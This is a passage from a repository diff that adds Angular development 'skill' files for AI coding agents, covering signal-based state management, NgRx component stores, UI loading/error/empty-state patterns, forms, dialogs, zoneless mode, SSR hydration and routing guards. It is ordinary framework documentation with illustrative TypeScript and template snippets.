export class TodoStore extends ComponentStore<TodoState> {
  constructor(private todoService: TodoService) {
    super({ todos: [], loading: false });
  }

  // Selectors
  readonly todos$ = this.select((state) => state.todos);
  readonly loading$ = this.select((state) => state.loading);
  readonly completedCount$ = this.select(
    this.todos$,
    (todos) => todos.filter((t) => t.completed).length,
  );

  // Updaters
  readonly addTodo = this.updater((state, todo: Todo) => ({
    ...state,
    todos: [...state.todos, todo],
  }));

  readonly toggleTodo = this.updater((state, id: string) => ({
    ...state,
    todos: state.todos.map((t) =>
      t.id === id ? { ...t, completed: !t.completed } : t,
    ),
  }));

  // Effects
  readonly loadTodos = this.effect<void>((trigger$) =>
    trigger$.pipe(
      tap(() => this.patchState({ loading: true })),
      switchMap(() =>
        this.todoService.getAll().pipe(
          tap({
            next: (todos) => this.patchState({ todos, loading: false }),
            error: () => this.patchState({ loading: false }),
          }),
          catchError(() => EMPTY),
        ),
      ),
    ),
  );
}
```

---

## Server State with Signals

### HTTP + Signals Pattern

```typescript
// services/api.service.ts
import { Injectable, signal, computed, inject } from "@angular/core";
import { HttpClient } from "@angular/common/http";
import { firstValueFrom } from "rxjs";

interface ApiState<T> {
  data: T | null;
  loading: boolean;
  error: string | null;
}

@Injectable({ providedIn: "root" })
export class ProductApiService {
  private http = inject(HttpClient);

  private _state = signal<ApiState<Product[]>>({
    data: null,
    loading: false,
    error: null,
  });

  readonly products = computed(() => this._state().data ?? []);
  readonly loading = computed(() => this._state().loading);
  readonly error = computed(() => this._state().error);

  async fetchProducts(): Promise<void> {
    this._state.update((s) => ({ ...s, loading: true, error: null }));

    try {
      const data = await firstValueFrom(
        this.http.get<Product[]>("/api/products"),
      );
      this._state.update((s) => ({ ...s, data, loading: false }));
    } catch (e) {
      this._state.update((s) => ({
        ...s,
        loading: false,
        error: "Failed to fetch products",
      }));
    }
  }

  // Optimistic update
  async deleteProduct(id: string): Promise<void> {
    const previousData = this._state().data;

    // Optimistically remove
    this._state.update((s) => ({
      ...s,
      data: s.data?.filter((p) => p.id !== id) ?? null,
    }));

    try {
      await firstValueFrom(this.http.delete(`/api/products/${id}`));
    } catch {
      // Rollback on error
      this._state.update((s) => ({ ...s, data: previousData }));
    }
  }
}
```

---

## Best Practices

### Do's

| Practice                           | Why                                |
| ---------------------------------- | ---------------------------------- |
| Use Signals for local state        | Simple, reactive, no subscriptions |
| Use `computed()` for derived data  | Auto-updates, memoized             |
| Colocate state with feature        | Easier to maintain                 |
| Use NgRx for complex flows         | Actions, effects, devtools         |
| Prefer `inject()` over constructor | Cleaner, works in factories        |

### Don'ts

| Anti-Pattern                      | Instead                                               |
| --------------------------------- | ----------------------------------------------------- |
| Store derived data                | Use `computed()`                                      |
| Mutate signals directly           | Use `set()` or `update()`                             |
| Over-globalize state              | Keep local when possible                              |
| Mix RxJS and Signals chaotically  | Choose primary, bridge with `toSignal`/`toObservable` |
| Subscribe in components for state | Use template with signals                             |

---

## Migration Path

### From BehaviorSubject to Signals

```typescript
// Before: RxJS-based
@Injectable({ providedIn: "root" })
export class OldUserService {
  private userSubject = new BehaviorSubject<User | null>(null);
  user$ = this.userSubject.asObservable();

  setUser(user: User) {
    this.userSubject.next(user);
  }
}

// After: Signal-based
@Injectable({ providedIn: "root" })
export class UserService {
  private _user = signal<User | null>(null);
  readonly user = this._user.asReadonly();

  setUser(user: User) {
    this._user.set(user);
  }
}
```

### Bridging Signals and RxJS

```typescript
import { toSignal, toObservable } from '@angular/core/rxjs-interop';
import { map, debounceTime, switchMap } from 'rxjs';

// Observable → Signal
@Component({...})
export class ExampleComponent {
  private route = inject(ActivatedRoute);

  // Convert Observable to Signal
  userId = toSignal(
    this.route.params.pipe(map(p => p['id'])),
    { initialValue: '' }
  );
}

// Signal → Observable
export class DataService {
  private http = inject(HttpClient);
  private filter = signal('');

  // Convert Signal to Observable
  filter$ = toObservable(this.filter);

  filteredData$ = this.filter$.pipe(
    debounceTime(300),
    switchMap(filter => this.http.get(`/api/data?q=${filter}`))
  );
}
```

---

## Resources

- [Angular Signals Guide](https://angular.dev/guide/signals)
- [NgRx Documentation](https://ngrx.io/)
- [NgRx SignalStore](https://ngrx.io/guide/signals)
- [RxAngular](https://www.rx-angular.io/)
13
packages/llm/skills/angular-state-management/metadata.json
Normal file
@ -0,0 +1,13 @@
{
  "version": "1.0.0",
  "organization": "Antigravity Awesome Skills",
  "date": "February 2026",
  "abstract": "Complete state management guide for Angular applications designed for AI agents and LLMs. Covers Signal-based services, NgRx for global state, RxJS patterns, and component stores. Includes decision trees for choosing the right solution, migration patterns from BehaviorSubject to Signals, and strategies for bridging Signals with RxJS observables.",
  "references": [
    "https://angular.dev/guide/signals",
    "https://ngrx.io",
    "https://ngrx.io/guide/signals",
    "https://www.rx-angular.io",
    "https://github.com/ngrx/platform"
  ]
}
55
packages/llm/skills/angular-ui-patterns/README.md
Normal file
@ -0,0 +1,55 @@
# Angular UI Patterns

Modern UI patterns for building robust Angular applications optimized for AI agents and LLMs.

## Overview

This skill covers essential UI patterns for:

- **Loading States** - Skeleton vs spinner decision trees
- **Error Handling** - Error boundary hierarchy and recovery
- **Progressive Disclosure** - Using `@defer` for lazy rendering
- **Data Display** - Handling empty, loading, and error states
- **Form Patterns** - Submission states and validation feedback
- **Dialog/Modal Patterns** - Proper dialog lifecycle management

## Core Principles

1. **Never show stale UI** - Only show loading when no data exists
2. **Surface all errors** - Never silently fail
3. **Optimistic updates** - Update UI before server confirms
4. **Progressive disclosure** - Use `@defer` to load non-critical content
5. **Graceful degradation** - Fallback for failed features

## Structure

The `SKILL.md` file includes:

1. **Golden Rules** - Non-negotiable patterns to follow
2. **Decision Trees** - When to use skeleton vs spinner
3. **Code Examples** - Correct vs incorrect implementations
4. **Anti-patterns** - Common mistakes to avoid

## Quick Reference

```html
<!-- Angular template pattern for data states -->
@if (error()) {
  <app-error-state [error]="error()" (retry)="load()" />
} @else if (loading() && !data()) {
  <app-skeleton-state />
} @else if (!data()?.length) {
  <app-empty-state message="No items found" />
} @else {
  <app-data-display [data]="data()" />
}
```

## Version

Current version: 1.0.0 (February 2026)

## References

- [Angular @defer](https://angular.dev/guide/defer)
- [Angular Templates](https://angular.dev/guide/templates)
512
packages/llm/skills/angular-ui-patterns/SKILL.md
Normal file
@ -0,0 +1,512 @@
---
name: angular-ui-patterns
description: "Modern Angular UI patterns for loading states, error handling, and data display. Use when building UI components, handling async data, or managing component states."
risk: safe
source: self
date_added: "2026-02-27"
---

# Angular UI Patterns

## Core Principles

1. **Never show stale UI** - Loading states only when actually loading
2. **Always surface errors** - Users must know when something fails
3. **Optimistic updates** - Make the UI feel instant
4. **Progressive disclosure** - Use `@defer` to show content as available
5. **Graceful degradation** - Partial data is better than no data

---

## Loading State Patterns

### The Golden Rule

**Show loading indicator ONLY when there's no data to display.**

```typescript
@Component({
  template: `
    @if (error()) {
      <app-error-state [error]="error()" (retry)="load()" />
    } @else if (loading() && !items().length) {
      <app-skeleton-list />
    } @else if (!items().length) {
      <app-empty-state message="No items found" />
    } @else {
      <app-item-list [items]="items()" />
    }
  `,
})
export class ItemListComponent {
  private store = inject(ItemStore);

  items = this.store.items;
  loading = this.store.loading;
  error = this.store.error;
}
```

### Loading State Decision Tree

```
Is there an error?
  → Yes: Show error state with retry option
  → No: Continue

Is it loading AND we have no data?
  → Yes: Show loading indicator (spinner/skeleton)
  → No: Continue

Do we have data?
  → Yes, with items: Show the data
  → Yes, but empty: Show empty state
  → No: Show loading (fallback)
```
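The tree above is pure precedence logic, so it can be unit-tested outside Angular. A minimal framework-free sketch (the `resolveViewState` helper name is our own illustration, not part of this skill):

```typescript
type ViewState = "error" | "loading" | "empty" | "data";

// Encodes the decision tree above as a pure function (hypothetical helper).
function resolveViewState(state: {
  error: unknown;
  loading: boolean;
  itemCount: number;
}): ViewState {
  if (state.error) return "error"; // 1. error always wins
  if (state.loading && state.itemCount === 0) return "loading"; // 2. loading with no data yet
  if (state.itemCount === 0) return "empty"; // 3. loaded, but nothing to show
  return "data"; // 4. show the items
}
```

Note that a refetch while data already exists still returns `"data"`, which is exactly the golden rule: refreshing never flashes a spinner over existing content.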

### Skeleton vs Spinner

| Use Skeleton When    | Use Spinner When      |
| -------------------- | --------------------- |
| Known content shape  | Unknown content shape |
| List/card layouts    | Modal actions         |
| Initial page load    | Button submissions    |
| Content placeholders | Inline operations     |

---

## Control Flow Patterns

### @if/@else for Conditional Rendering

```html
@if (user(); as user) {
  <span>Welcome, {{ user.name }}</span>
} @else if (loading()) {
  <app-spinner size="small" />
} @else {
  <a routerLink="/login">Sign In</a>
}
```

### @for with Track

```html
@for (item of items(); track item.id) {
  <app-item-card [item]="item" (delete)="remove(item.id)" />
} @empty {
  <app-empty-state
    icon="inbox"
    message="No items yet"
    actionLabel="Create Item"
    (action)="create()"
  />
}
```

### @defer for Progressive Loading

```html
<!-- Critical content loads immediately -->
<app-header />
<app-hero-section />

<!-- Non-critical content deferred -->
@defer (on viewport) {
  <app-comments [postId]="postId()" />
} @placeholder {
  <div class="h-32 bg-gray-100 animate-pulse"></div>
} @loading (minimum 200ms) {
  <app-spinner />
} @error {
  <app-error-state message="Failed to load comments" />
}
```

---

## Error Handling Patterns

### Error Handling Hierarchy

```
1. Inline error (field-level) → Form validation errors
2. Toast notification → Recoverable errors, user can retry
3. Error banner → Page-level errors, data still partially usable
4. Full error screen → Unrecoverable, needs user action
```
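One way to make the hierarchy mechanical is to map error classes to a surface. A framework-free sketch — the status-to-surface mapping below is an illustrative assumption, not a rule stated by this skill:

```typescript
type ErrorSurface = "inline" | "toast" | "banner" | "screen";

// Hypothetical mapping from HTTP status to the four surfaces above.
function errorSurfaceFor(status: number): ErrorSurface {
  if (status === 400 || status === 422) return "inline"; // validation → field-level
  if (status === 408 || status === 429) return "toast"; // transient, user can retry
  if (status >= 500) return "banner"; // page degraded, data may be partial
  return "screen"; // e.g. 401/403/404: needs user action
}
```

Centralizing this choice (for example in an HTTP interceptor) keeps individual components from inventing their own error presentation.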
|
||||
|
||||
### Always Show Errors
|
||||
|
||||
**CRITICAL: Never swallow errors silently.**
|
||||
|
||||
```typescript
|
||||
// CORRECT - Error always surfaced to user
|
||||
@Component({...})
|
||||
export class CreateItemComponent {
|
||||
private store = inject(ItemStore);
|
||||
private toast = inject(ToastService);
|
||||
|
||||
async create(data: CreateItemDto) {
|
||||
try {
|
||||
await this.store.create(data);
|
||||
this.toast.success('Item created successfully');
|
||||
this.router.navigate(['/items']);
|
||||
} catch (error) {
|
||||
console.error('createItem failed:', error);
|
||||
this.toast.error('Failed to create item. Please try again.');
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// WRONG - Error silently caught
|
||||
async create(data: CreateItemDto) {
|
||||
try {
|
||||
await this.store.create(data);
|
||||
} catch (error) {
|
||||
console.error(error); // User sees nothing!
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Error State Component Pattern
|
||||
|
||||
```typescript
|
||||
@Component({
|
||||
selector: "app-error-state",
|
||||
standalone: true,
|
||||
imports: [NgOptimizedImage],
|
||||
template: `
|
||||
<div class="error-state">
|
||||
<img ngSrc="/assets/error-icon.svg" width="64" height="64" alt="" />
|
||||
<h3>{{ title() }}</h3>
|
||||
<p>{{ message() }}</p>
|
||||
@if (retry.observed) {
|
||||
<button (click)="retry.emit()" class="btn-primary">Try Again</button>
|
||||
}
|
||||
</div>
|
||||
`,
|
||||
})
|
||||
export class ErrorStateComponent {
|
||||
title = input("Something went wrong");
|
||||
message = input("An unexpected error occurred");
|
||||
retry = output<void>();
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Button State Patterns
|
||||
|
||||
### Button Loading State
|
||||
|
||||
```html
|
||||
<button
|
||||
(click)="handleSubmit()"
|
||||
[disabled]="isSubmitting() || !form.valid"
|
||||
class="btn-primary"
|
||||
>
|
||||
@if (isSubmitting()) {
|
||||
<app-spinner size="small" class="mr-2" />
|
||||
Saving... } @else { Save Changes }
|
||||
</button>
|
||||
```
|
||||
|
||||
### Disable During Operations
|
||||
|
||||
**CRITICAL: Always disable triggers during async operations.**
|
||||
|
||||
```typescript
|
||||
// CORRECT - Button disabled while loading
|
||||
@Component({
|
||||
template: `
|
||||
<button
|
||||
[disabled]="saving()"
|
||||
(click)="save()"
|
||||
>
|
||||
@if (saving()) {
|
||||
<app-spinner size="sm" /> Saving...
|
||||
} @else {
|
||||
Save
|
||||
}
|
||||
</button>
|
||||
`
|
||||
})
|
||||
export class SaveButtonComponent {
|
||||
saving = signal(false);
|
||||
|
||||
async save() {
|
||||
this.saving.set(true);
|
||||
try {
|
||||
await this.service.save();
|
||||
} finally {
|
||||
this.saving.set(false);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// WRONG - User can click multiple times
|
||||
<button (click)="save()">
|
||||
{{ saving() ? 'Saving...' : 'Save' }}
|
||||
</button>
|
||||
```

---

## Empty States

### Empty State Requirements

Every list/collection MUST have an empty state:

```html
@for (item of items(); track item.id) {
  <app-item-card [item]="item" />
} @empty {
  <app-empty-state
    icon="folder-open"
    title="No items yet"
    description="Create your first item to get started"
    actionLabel="Create Item"
    (action)="openCreateDialog()"
  />
}
```

### Contextual Empty States

```typescript
@Component({
  selector: "app-empty-state",
  template: `
    <div class="empty-state">
      <span class="icon" [class]="icon()"></span>
      <h3>{{ title() }}</h3>
      <p>{{ description() }}</p>
      @if (actionLabel()) {
        <button (click)="action.emit()" class="btn-primary">
          {{ actionLabel() }}
        </button>
      }
    </div>
  `,
})
export class EmptyStateComponent {
  icon = input("inbox");
  title = input.required<string>();
  description = input("");
  actionLabel = input<string | null>(null);
  action = output<void>();
}
```

---

## Form Patterns

### Form with Loading and Validation

```typescript
@Component({
  template: `
    <form [formGroup]="form" (ngSubmit)="onSubmit()">
      <div class="form-field">
        <label for="name">Name</label>
        <input
          id="name"
          formControlName="name"
          [class.error]="isFieldInvalid('name')"
        />
        @if (isFieldInvalid("name")) {
          <span class="error-text">
            {{ getFieldError("name") }}
          </span>
        }
      </div>

      <div class="form-field">
        <label for="email">Email</label>
        <input id="email" type="email" formControlName="email" />
        @if (isFieldInvalid("email")) {
          <span class="error-text">
            {{ getFieldError("email") }}
          </span>
        }
      </div>

      <button type="submit" [disabled]="form.invalid || submitting()">
        @if (submitting()) {
          <app-spinner size="sm" /> Submitting...
        } @else {
          Submit
        }
      </button>
    </form>
  `,
})
export class UserFormComponent {
  private fb = inject(FormBuilder);

  submitting = signal(false);

  form = this.fb.group({
    name: ["", [Validators.required, Validators.minLength(2)]],
    email: ["", [Validators.required, Validators.email]],
  });

  isFieldInvalid(field: string): boolean {
    const control = this.form.get(field);
    return control ? control.invalid && control.touched : false;
  }

  getFieldError(field: string): string {
    const control = this.form.get(field);
    if (control?.hasError("required")) return "This field is required";
    if (control?.hasError("email")) return "Invalid email format";
    if (control?.hasError("minlength")) return "Too short";
    return "";
  }

  async onSubmit() {
    if (this.form.invalid) return;

    this.submitting.set(true);
    try {
      await this.service.submit(this.form.value);
      this.toast.success("Submitted successfully");
    } catch {
      this.toast.error("Submission failed");
    } finally {
      this.submitting.set(false);
    }
  }
}
```

---

## Dialog/Modal Patterns

### Confirmation Dialog

```typescript
// dialog.service.ts
@Injectable({ providedIn: 'root' })
export class DialogService {
  private dialog = inject(Dialog); // CDK Dialog or custom

  async confirm(options: {
    title: string;
    message: string;
    confirmText?: string;
    cancelText?: string;
  }): Promise<boolean> {
    const dialogRef = this.dialog.open(ConfirmDialogComponent, {
      data: options,
    });

    return (await firstValueFrom(dialogRef.closed)) ?? false;
  }
}

// Usage
async deleteItem(item: Item) {
  const confirmed = await this.dialog.confirm({
    title: 'Delete Item',
    message: `Are you sure you want to delete "${item.name}"?`,
    confirmText: 'Delete',
  });

  if (confirmed) {
    await this.store.delete(item.id);
  }
}
```

---

## Anti-Patterns

### Loading States

```typescript
// WRONG - Spinner whenever loading, even when data exists (causes flash on refetch)
@if (loading()) {
  <app-spinner />
}

// CORRECT - Only show the spinner when there is no data yet
@if (loading() && !items().length) {
  <app-spinner />
}
```

### Error Handling

```typescript
// WRONG - Error swallowed
try {
  await this.service.save();
} catch (e) {
  console.log(e); // User has no idea!
}

// CORRECT - Error surfaced
try {
  await this.service.save();
} catch (e) {
  console.error("Save failed:", e);
  this.toast.error("Failed to save. Please try again.");
}
```

### Button States

```html
<!-- WRONG - Button not disabled during submission -->
<button (click)="submit()">Submit</button>

<!-- CORRECT - Disabled and shows loading -->
<button (click)="submit()" [disabled]="loading()">
  @if (loading()) {
    <app-spinner size="sm" />
  }
  Submit
</button>
```

---

## UI State Checklist

Before completing any UI component:

### UI States

- [ ] Error state handled and shown to user
- [ ] Loading state shown only when no data exists
- [ ] Empty state provided for collections (`@empty` block)
- [ ] Buttons disabled during async operations
- [ ] Buttons show loading indicator when appropriate

### Data & Mutations

- [ ] All async operations have error handling
- [ ] All user actions have feedback (toast/visual)
- [ ] Optimistic updates roll back on failure

### Accessibility

- [ ] Loading states announced to screen readers
- [ ] Error messages linked to form fields
- [ ] Focus management after state changes
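The "optimistic updates roll back on failure" item is easy to get wrong, so here is a minimal, framework-free sketch of the pattern. The `Item` type, `renameItem` name, and `persist` callback are hypothetical; in a component you would keep the array in a signal and `set` it with the returned value.

```typescript
// Hypothetical sketch: apply a change immediately, keep a snapshot,
// and restore the snapshot if persistence fails.
type Item = { id: string; name: string };

async function renameItem(
  items: Item[],
  id: string,
  name: string,
  persist: (item: Item) => Promise<void>, // e.g. an HTTP call
): Promise<Item[]> {
  const snapshot = items; // rollback target
  // Optimistic: build the updated state before the server confirms
  const optimistic = items.map((i) => (i.id === id ? { ...i, name } : i));
  try {
    await persist(optimistic.find((i) => i.id === id)!);
    return optimistic; // commit
  } catch {
    return snapshot; // rollback on failure
  }
}
```

In a Signal store this would typically read `this._items.set(await renameItem(this._items(), ...))`, with a toast on the failure path so the rollback is visible to the user.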

---

## Integration with Other Skills

- **angular-state-management**: Use Signal stores for state
- **angular**: Apply modern patterns (Signals, @defer)
- **testing-patterns**: Test all UI states

## When to Use

Use this skill when implementing or reviewing UI states in Angular applications: loading and error handling, empty states, form feedback, button states, and dialog flows.
12
packages/llm/skills/angular-ui-patterns/metadata.json
Normal file
@ -0,0 +1,12 @@

{
  "version": "1.0.0",
  "organization": "Antigravity Awesome Skills",
  "date": "February 2026",
  "abstract": "Modern UI patterns for Angular applications designed for AI agents and LLMs. Covers loading states, error handling, progressive disclosure, and data display patterns. Emphasizes showing loading only without data, surfacing all errors, optimistic updates, and graceful degradation using @defer. Includes decision trees and anti-patterns to avoid.",
  "references": [
    "https://angular.dev/guide/defer",
    "https://angular.dev/guide/templates",
    "https://material.angular.io",
    "https://ng-spartan.com"
  ]
}
40
packages/llm/skills/angular/README.md
Normal file
@ -0,0 +1,40 @@

# Angular

A comprehensive guide to modern Angular development (v20+) optimized for AI agents and LLMs.

## Overview

This skill covers modern Angular patterns including:

- **Signals** - Angular's reactive primitive for state management
- **Standalone Components** - Modern component architecture without NgModules
- **Zoneless Applications** - High-performance apps without Zone.js
- **SSR & Hydration** - Server-side rendering and client hydration patterns
- **Modern Routing** - Functional guards, resolvers, and lazy loading
- **Dependency Injection** - Modern DI with the `inject()` function
- **Reactive Forms** - Type-safe form handling

## Structure

This skill is a single, comprehensive `SKILL.md` file containing:

1. Modern component patterns with Signal inputs/outputs
2. State management with Signals and computed values
3. Performance optimization techniques
4. SSR and hydration best practices
5. Migration strategies from legacy Angular patterns

## Usage

This skill is designed to be read in full for the complete modern Angular development approach, or referenced for specific patterns as needed.

## Version

Current version: 1.0.0 (February 2026)

## References

- [Angular Documentation](https://angular.dev)
- [Angular Signals](https://angular.dev/guide/signals)
- [Zoneless Angular](https://angular.dev/guide/zoneless)
- [Angular SSR](https://angular.dev/guide/ssr)
818
packages/llm/skills/angular/SKILL.md
Normal file
@ -0,0 +1,818 @@

---
name: angular
description: Modern Angular (v20+) expert with deep knowledge of Signals, Standalone Components, Zoneless applications, SSR/Hydration, and reactive patterns.
risk: safe
source: self
date_added: '2026-02-27'
---

# Angular Expert

Master modern Angular development with Signals, Standalone Components, Zoneless applications, SSR/Hydration, and the latest reactive patterns.

## When to Use This Skill

- Building new Angular applications (v20+)
- Implementing Signals-based reactive patterns
- Creating Standalone Components and migrating from NgModules
- Configuring Zoneless Angular applications
- Implementing SSR, prerendering, and hydration
- Optimizing Angular performance
- Adopting modern Angular patterns and best practices

## Do Not Use This Skill When

- Migrating from AngularJS (1.x) → use the `angular-migration` skill
- Working with legacy Angular apps that cannot upgrade
- Handling general TypeScript issues → use the `typescript-expert` skill

## Instructions

1. Assess the Angular version and project structure
2. Apply modern patterns (Signals, Standalone, Zoneless)
3. Implement with proper typing and reactivity
4. Validate with build and tests

## Safety

- Always test changes in development before production
- Migrate existing apps gradually (don't big-bang refactor)
- Keep backward compatibility during transitions

---

## Angular Version Timeline

| Version        | Release | Key Features                                           |
| -------------- | ------- | ------------------------------------------------------ |
| **Angular 20** | Q2 2025 | Signals stable, Zoneless stable, Incremental hydration |
| **Angular 21** | Q4 2025 | Signals-first default, Enhanced SSR                    |
| **Angular 22** | Q2 2026 | Signal Forms, Selectorless components                  |

---

## 1. Signals: The New Reactive Primitive

Signals are Angular's fine-grained reactivity system, replacing zone.js-based change detection.

### Core Concepts

```typescript
import { signal, computed, effect } from "@angular/core";

// Writable signal
const count = signal(0);

// Read value
console.log(count()); // 0

// Update value
count.set(5); // Direct set
count.update((v) => v + 1); // Functional update

// Computed (derived) signal
const doubled = computed(() => count() * 2);

// Effect (side effects)
effect(() => {
  console.log(`Count changed to: ${count()}`);
});
```

### Signal-Based Inputs and Outputs

```typescript
import { Component, input, output, model } from "@angular/core";

@Component({
  selector: "app-user-card",
  standalone: true,
  template: `
    <div class="card">
      <h3>{{ name() }}</h3>
      <span>{{ role() }}</span>
      <button (click)="select.emit(id())">Select</button>
    </div>
  `,
})
export class UserCardComponent {
  // Signal inputs (read-only)
  id = input.required<string>();
  name = input.required<string>();
  role = input<string>("User"); // With default

  // Output
  select = output<string>();

  // Two-way binding (model)
  isSelected = model(false);
}

// Usage:
// <app-user-card [id]="'123'" [name]="'John'" [(isSelected)]="selected" />
```

### Signal Queries (ViewChild/ContentChild)

```typescript
import {
  Component,
  viewChild,
  viewChildren,
  contentChild,
} from "@angular/core";

@Component({
  selector: "app-container",
  standalone: true,
  template: `
    <input #searchInput />
    @for (item of items(); track $index) {
      <app-item />
    }
  `,
})
export class ContainerComponent {
  // Signal-based queries
  searchInput = viewChild<ElementRef>("searchInput");
  items = viewChildren(ItemComponent);
  projectedContent = contentChild(HeaderDirective);

  focusSearch() {
    this.searchInput()?.nativeElement.focus();
  }
}
```

### When to Use Signals vs RxJS

| Use Case                | Signals         | RxJS                             |
| ----------------------- | --------------- | -------------------------------- |
| Local component state   | ✅ Preferred    | Overkill                         |
| Derived/computed values | ✅ `computed()` | `combineLatest` works            |
| Side effects            | ✅ `effect()`   | `tap` operator                   |
| HTTP requests           | ❌              | ✅ HttpClient returns Observable |
| Event streams           | ❌              | ✅ `fromEvent`, operators        |
| Complex async flows     | ❌              | ✅ `switchMap`, `mergeMap`       |

---

## 2. Standalone Components

Standalone components are self-contained and don't require NgModule declarations.

### Creating Standalone Components

```typescript
import { Component } from "@angular/core";
import { CommonModule } from "@angular/common";
import { RouterLink } from "@angular/router";

@Component({
  selector: "app-header",
  standalone: true,
  imports: [CommonModule, RouterLink], // Direct imports
  template: `
    <header>
      <a routerLink="/">Home</a>
      <a routerLink="/about">About</a>
    </header>
  `,
})
export class HeaderComponent {}
```

### Bootstrapping Without NgModule

```typescript
// main.ts
import { bootstrapApplication } from "@angular/platform-browser";
import { provideRouter } from "@angular/router";
import { provideHttpClient } from "@angular/common/http";
import { AppComponent } from "./app/app.component";
import { routes } from "./app/app.routes";

bootstrapApplication(AppComponent, {
  providers: [provideRouter(routes), provideHttpClient()],
});
```

### Lazy Loading Standalone Components

```typescript
// app.routes.ts
import { Routes } from "@angular/router";

export const routes: Routes = [
  {
    path: "dashboard",
    loadComponent: () =>
      import("./dashboard/dashboard.component").then(
        (m) => m.DashboardComponent,
      ),
  },
  {
    path: "admin",
    loadChildren: () =>
      import("./admin/admin.routes").then((m) => m.ADMIN_ROUTES),
  },
];
```

---

## 3. Zoneless Angular

Zoneless applications don't use zone.js, improving performance and debugging.

### Enabling Zoneless Mode

```typescript
// main.ts
import { bootstrapApplication } from "@angular/platform-browser";
import { provideZonelessChangeDetection } from "@angular/core";
import { AppComponent } from "./app/app.component";

bootstrapApplication(AppComponent, {
  providers: [provideZonelessChangeDetection()],
});
```

### Zoneless Component Patterns

```typescript
import { Component, signal, ChangeDetectionStrategy } from "@angular/core";

@Component({
  selector: "app-counter",
  standalone: true,
  changeDetection: ChangeDetectionStrategy.OnPush,
  template: `
    <div>Count: {{ count() }}</div>
    <button (click)="increment()">+</button>
  `,
})
export class CounterComponent {
  count = signal(0);

  increment() {
    this.count.update((v) => v + 1);
    // No zone.js needed - the Signal triggers change detection
  }
}
```

### Key Zoneless Benefits

- **Performance**: No zone.js patches on async APIs
- **Debugging**: Clean stack traces without zone wrappers
- **Bundle size**: Smaller without zone.js (~15KB savings)
- **Interoperability**: Better with Web Components and micro-frontends

---

## 4. Server-Side Rendering & Hydration

### SSR Setup with Angular CLI

```bash
ng add @angular/ssr
```

### Hydration Configuration

```typescript
// app.config.ts
import { ApplicationConfig } from "@angular/core";
import {
  provideClientHydration,
  withEventReplay,
} from "@angular/platform-browser";

export const appConfig: ApplicationConfig = {
  providers: [provideClientHydration(withEventReplay())],
};
```

### Incremental Hydration (v20+)

```typescript
import { Component } from "@angular/core";

@Component({
  selector: "app-page",
  standalone: true,
  template: `
    <app-hero />

    @defer (hydrate on viewport) {
      <app-comments />
    }

    @defer (hydrate on interaction) {
      <app-chat-widget />
    }
  `,
})
export class PageComponent {}
```

### Hydration Triggers

| Trigger          | When to Use                             |
| ---------------- | --------------------------------------- |
| `on idle`        | Low-priority, hydrate when browser idle |
| `on viewport`    | Hydrate when element enters viewport    |
| `on interaction` | Hydrate on first user interaction       |
| `on hover`       | Hydrate when user hovers                |
| `on timer(ms)`   | Hydrate after specified delay           |
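Putting the triggers together, a single page template might stagger hydration by priority. A sketch (the component names here are illustrative, not from this skill):

```html
<!-- Above-the-fold content hydrates normally -->
<app-hero />

@defer (hydrate on idle) {
  <app-footer />
}

@defer (hydrate on timer(3s)) {
  <app-newsletter-banner />
}
```

The general rule: the less likely a user is to interact with a block early, the cheaper its trigger should be.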

---

## 5. Modern Routing Patterns

### Functional Route Guards

```typescript
// auth.guard.ts
import { inject } from "@angular/core";
import { Router, CanActivateFn } from "@angular/router";
import { AuthService } from "./auth.service";

export const authGuard: CanActivateFn = (route, state) => {
  const auth = inject(AuthService);
  const router = inject(Router);

  if (auth.isAuthenticated()) {
    return true;
  }

  return router.createUrlTree(["/login"], {
    queryParams: { returnUrl: state.url },
  });
};

// Usage in routes
export const routes: Routes = [
  {
    path: "dashboard",
    loadComponent: () => import("./dashboard.component"),
    canActivate: [authGuard],
  },
];
```

### Route-Level Data Resolvers

```typescript
import { inject } from '@angular/core';
import { ResolveFn } from '@angular/router';
import { UserService } from './user.service';
import { User } from './user.model';

export const userResolver: ResolveFn<User> = (route) => {
  const userService = inject(UserService);
  return userService.getUser(route.paramMap.get('id')!);
};

// In routes
{
  path: 'user/:id',
  loadComponent: () => import('./user.component'),
  resolve: { user: userResolver }
}

// In component
export class UserComponent {
  private route = inject(ActivatedRoute);
  user = toSignal(this.route.data.pipe(map(d => d['user'])));
}
```

---

## 6. Dependency Injection Patterns

### Modern inject() Function

```typescript
import { Component, inject } from '@angular/core';
import { HttpClient } from '@angular/common/http';
import { UserService } from './user.service';

@Component({...})
export class UserComponent {
  // Modern inject() - no constructor needed
  private http = inject(HttpClient);
  private userService = inject(UserService);

  // Works in any injection context
  users = toSignal(this.userService.getUsers());
}
```

### Injection Tokens for Configuration

```typescript
import { InjectionToken, inject } from "@angular/core";

// Define token
export const API_BASE_URL = new InjectionToken<string>("API_BASE_URL");

// Provide in config
bootstrapApplication(AppComponent, {
  providers: [{ provide: API_BASE_URL, useValue: "https://api.example.com" }],
});

// Inject in service
@Injectable({ providedIn: "root" })
export class ApiService {
  private http = inject(HttpClient);
  private baseUrl = inject(API_BASE_URL);

  get(endpoint: string) {
    return this.http.get(`${this.baseUrl}/${endpoint}`);
  }
}
```

---

## 7. Component Composition & Reusability

### Content Projection (Slots)

```typescript
@Component({
  selector: 'app-card',
  template: `
    <div class="card">
      <div class="header">
        <!-- Select by attribute -->
        <ng-content select="[card-header]"></ng-content>
      </div>
      <div class="body">
        <!-- Default slot -->
        <ng-content></ng-content>
      </div>
    </div>
  `
})
export class CardComponent {}

// Usage
<app-card>
  <h3 card-header>Title</h3>
  <p>Body content</p>
</app-card>
```

### Host Directives (Composition)

```typescript
// Reusable behaviors without inheritance
@Directive({
  standalone: true,
  selector: '[appTooltip]',
  inputs: ['tooltip'] // Expose the tooltip input
})
export class TooltipDirective { ... }

@Component({
  selector: 'app-button',
  standalone: true,
  hostDirectives: [
    {
      directive: TooltipDirective,
      inputs: ['tooltip: title'] // Map input
    }
  ],
  template: `<ng-content />`
})
export class ButtonComponent {}
```

---

## 8. State Management Patterns

### Signal-Based State Service

```typescript
import { Injectable, signal, computed } from "@angular/core";

interface AppState {
  user: User | null;
  theme: "light" | "dark";
  notifications: Notification[];
}

@Injectable({ providedIn: "root" })
export class StateService {
  // Private writable signals
  private _user = signal<User | null>(null);
  private _theme = signal<"light" | "dark">("light");
  private _notifications = signal<Notification[]>([]);

  // Public read-only computed
  readonly user = computed(() => this._user());
  readonly theme = computed(() => this._theme());
